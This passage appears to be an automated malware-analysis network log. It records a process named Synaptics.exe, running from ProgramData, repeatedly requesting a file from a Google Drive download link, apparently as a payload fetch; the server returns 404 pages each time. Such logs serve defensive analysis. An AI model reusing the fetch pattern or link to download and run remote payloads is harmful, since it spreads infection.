                                                                                            2025-01-02 19:30:13 UTC1250INHTTP/1.1 404 Not Found
                                                                                            X-GUploader-UploadID: AFiumC4TyRTccBECYo2TD1GYGzwyu-Jl0hf5FmlwLivFKFPtG3z96yqZd6ZwLcSOykGyo7QFkbo0HGU
                                                                                            Content-Type: text/html; charset=utf-8
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:30:12 GMT
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-6hwCT0PAm03me-gpj7T7BA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Content-Length: 1652
                                                                                            Server: UploadServer
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                            Connection: close
                                                                                            2025-01-02 19:30:13 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                            2025-01-02 19:30:13 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4f 43 45 50 68 67 33 52 48 56 4d 31 73 67 6d 35 77 4c 58 6f 2d 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                            Data Ascii: 404 (Not Found)!!1</title><style nonce="OCEPhg3RHVM1sgm5wLXo-Q">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                            2025-01-02 19:30:13 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                            Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            110192.168.2.950151172.217.18.144437712C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-02 19:30:12 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                                                                                            2025-01-02 19:30:13 UTC1314INHTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:30:12 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-EzMuuOOPhXVgcr1B9l0dOQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            111192.168.2.950155172.217.18.144437712C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-02 19:30:13 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                                                                                            2025-01-02 19:30:13 UTC1314INHTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:30:13 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-r1vaUvNCfWvdZvKN-GEbAg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            112192.168.2.950156216.58.206.654437712C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-02 19:30:13 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Cache-Control: no-cache
                                                                                            Host: drive.usercontent.google.com
                                                                                            Connection: Keep-Alive
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            113192.168.2.950157172.217.18.144437712C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-02 19:30:13 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            114192.168.2.950158216.58.206.654437712C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-02 19:30:13 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Cache-Control: no-cache
                                                                                            Host: drive.usercontent.google.com
                                                                                            Connection: Keep-Alive
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            115192.168.2.950162172.217.18.144437712C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-02 19:30:14 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                                                                                            2025-01-02 19:30:14 UTC1314INHTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:30:14 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-tpqSnyXaac4-NShtB7ecFQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            116192.168.2.950161172.217.18.144437712C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-02 19:30:14 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                                                                                            2025-01-02 19:30:14 UTC1314INHTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:30:14 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-4jryn52bcGOuM-wBT-D2nA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            117192.168.2.950160216.58.206.654437712C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-02 19:30:14 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Cache-Control: no-cache
                                                                                            Host: drive.usercontent.google.com
                                                                                            Connection: Keep-Alive
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                                                                                            2025-01-02 19:30:14 UTC1243INHTTP/1.1 404 Not Found
                                                                                            X-GUploader-UploadID: AFiumC4cVAvrhCVJu55K_LZr3qAV0YlaXtPYhN8tJXMGHWQEYIf8C_2X5eurI8rXvXjWdJn_
                                                                                            Content-Type: text/html; charset=utf-8
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:30:14 GMT
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-qxExPVE64mQdi6e0M4cDIw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Content-Length: 1652
                                                                                            Server: UploadServer
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                            Connection: close
                                                                                            2025-01-02 19:30:14 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                            2025-01-02 19:30:14 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 69 6f 48 59 58 57 6b 72 4d 77 6e 4d 65 39 6d 71 6b 4b 50 6a 70 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                            Data Ascii: t Found)!!1</title><style nonce="ioHYXWkrMwnMe9mqkKPjpQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                            2025-01-02 19:30:14 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                            Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            118192.168.2.950164216.58.206.654437712C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-02 19:30:15 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Cache-Control: no-cache
                                                                                            Host: drive.usercontent.google.com
                                                                                            Connection: Keep-Alive
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                                                                                            2025-01-02 19:30:16 UTC1250INHTTP/1.1 404 Not Found
                                                                                            X-GUploader-UploadID: AFiumC6y52_J0jto88mfOP07SpBorMSx1Iu_RDgiHwG736P_p_Lr4Vc1LAAbmIr2nXBlA_S7MBlAk7Y
                                                                                            Content-Type: text/html; charset=utf-8
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:30:15 GMT
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-LWn_vLWcPapakJmlyJ8Aeg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Content-Length: 1652
                                                                                            Server: UploadServer
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                            Connection: close
                                                                                            2025-01-02 19:30:16 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                            2025-01-02 19:30:16 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 77 6d 62 34 71 75 36 67 47 42 70 6d 54 33 54 73 74 61 51 45 75 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                            Data Ascii: 404 (Not Found)!!1</title><style nonce="wmb4qu6gGBpmT3TstaQEuA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                            2025-01-02 19:30:16 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                            Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            119192.168.2.950165172.217.18.144437712C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-02 19:30:15 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
